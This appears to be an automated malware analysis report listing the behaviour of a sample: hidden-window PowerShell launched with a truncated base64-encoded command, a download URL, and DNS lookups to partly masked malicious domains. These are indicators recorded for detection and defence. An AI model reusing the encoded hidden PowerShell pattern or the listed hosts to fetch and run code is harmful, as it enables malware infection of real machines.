Technical Information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -en PAAjACAATAB3AG4AcQBqAGMAdABiACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvAEUAcwB4AGQAbwByAHMAcwBlAGgAIAAjAD4AIAAkAFAAagBkAHkAcQBqAGsAeABwAGkAeQBmAD0AJwBDAGcAcABrA...
- http://wp.###hlearn.com/eabhhv3/wwEIXS/
- DNS ASK wp.###hlearn.com
- DNS ASK sn#######mes.000webhostapp.com
- DNS ASK at#######eba.000webhostapp.com
- DNS ASK lu#######ees2.000webhostapp.com
- DNS ASK 24##sr.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -en PAAjACAATAB3AG4AcQBqAGMAdABiACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvAEUAcwB4AGQAbwByAHMAcwBlAGgAIAAjAD4AIAAkAFAAagBkAHkAcQBqAGsAeABwAGkAeQBmAD0AJwBDAGcAcABrA...' (with hidden window)